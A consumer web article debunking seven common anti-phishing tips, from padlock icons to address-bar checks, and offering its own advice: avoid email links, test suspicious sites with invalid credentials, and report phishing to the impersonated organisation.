Anti-Phishing tips debunked: Today every other online banking website features the "anti-phishing tips" page intended to teach an ordinary computer user how to fight those annoying emails collecting your personal data.
While this educational initiative is praiseworthy, many of the tips, and some of them originate from security experts, are in fact questionable, incorrect, or misleading.
This article debunks the most common myths. At the end of this page you'll find a couple of tips that will help you correctly identify both valid and impersonated websites.
Myth #1: Secure, encrypted web page indicates a valid website.
Contrary to a popular advise, never rely solely on "https://" prefix or padlock icon that indicate a "secure" page. It is possible for a phishing website to have a valid SSL certificate.
You might want to check certificate details to see if the "Common Name" field of the certificate matches the host name of the organization's website, but it requires some level of technical expertise.
Myth #2: Secured by [insert authority name]. Click here to verify.
Have you seen those? Well, they are worthless. The splash window you get by clicking on the link does not guarantee that you are on a legitimate website.
Myth #3: Address bar always shows a correct URL.
Another faulty advice is to check if the address bar contains a correct URL. It is not enough to ensure validity of a website.
Vulnerabilities in browser software could allow phishers to spoof information in the address bar.
There is another type of attack (DNS Spoofing) that can also trick you to think you are visiting a valid website.
Myth #4: Moving mouse over a link shows the real URL in the status bar.
Status bar text can easily be changed. In fact, it is even easier that spoofing the address bar content.
Myth #5: Anti-phishing software prevents scams.
Similarly to antiviral software's inability to detect new malicious code, your Anti-phishing browser plug-in (often offered for free by internet providers) is incapable of detecting all phishing attempts.
On the contrary, by adding software (sometimes of questionable quality) to your browser you make yourself vulnerable to the malware that specifically targets that software.
Myth #6: An email containing your personal data is legitimate.
If you receive the message from your bank and it contains your name and your account number (or a part of it), it might as well be a fraudulent email.
Phishers can get access to some of your personal data by using public databases or data leaked from other organizations.
Myth #7: It is safe to log in once you know the website is legitimate.
NO! Website vulnerabilities (called Cross-Site Scripting) could allow a sophisticated attacker to use the form on company's website to capture your credentials by redirecting you to attacker's website as soon as you click "Login" button or hit "Enter". Read our tips below on how to prevent this.
What to do to avoid getting scammed
In today's digital age, where online threats and scams are prevalent, it is crucial to be vigilant and take proactive measures to protect ourselves from falling victim to fraudulent activities.
Scammers employ various tactics, such as phishing emails, fake websites, and social engineering, to deceive unsuspecting individuals and steal personal information or financial assets.
To safeguard against these scams, it is essential to be well-informed and adopt a proactive approach to online security.
This article provides practical tips and guidance on what individuals can do to avoid getting scammed, empowering them to navigate the digital landscape safely and confidently.
By following these recommended precautions, users can significantly reduce the risk of falling prey to scams and protect their personal and financial well-being.
Tip #1: Do not click on links in your e-mail.
If you receive a message from your bank asking you to do something, do not click on links in the email and do not use forms in the email to log in.
Instead, open your browser, go directly to your bank's website, log in, and continue there. Even if the email is from someone you know, DO NOT CLICK ON THE LINKS.
Tip #2: Invalid credentials usually work on impersonated websites.
If you feel there is something wrong with a website, use invalid username and invalid password to log in.
If the website then presents you with the "Logon failed" page, you are possibly on a legitimate website.
It may not always work as sometimes impersonators simulate failed logons for double-checking victim's input or redirect to a legitimate website after collecting credentials. But if your invalid credentials get you right through - it is definitely a phishing attempt.
Tip #3: Report the message to the company impersonated in the email.
Most financial organizations have guidelines and dedicated email addresses where to report security problems.
If you suspect a message is a phishing attempt, forward it to the organization. You can find email address to forward suspicious emails to in our Scam Reporting Database. You should include all email headers.
Do not expect a reply from the organization as they receive thousands of those reports.
The bottom line
In conclusion, it is essential to be cautious and well-informed when it comes to protecting ourselves from phishing scams.
This article has debunked common anti-phishing tips that can be misleading or ineffective in identifying fraudulent activities.
Relying solely on indicators like secure web pages, authority logos, or address bar URLs may not provide the foolproof protection we need. Additionally, anti-phishing software has its limitations.
To avoid getting scammed, it is recommended to follow alternative tips provided in the article.
These include avoiding clicking on links in emails, using invalid credentials on suspicious websites, and reporting phishing attempts to the targeted organizations.
By adopting these proactive measures, we can enhance our online security and reduce the risk of falling victim to phishing attacks.
In the ever-evolving landscape of online threats, staying informed and being aware of the latest tactics employed by scammers is crucial.
By keeping our knowledge up to date and practicing caution in our online interactions, we can better protect our personal information and financial well-being from phishing scams.
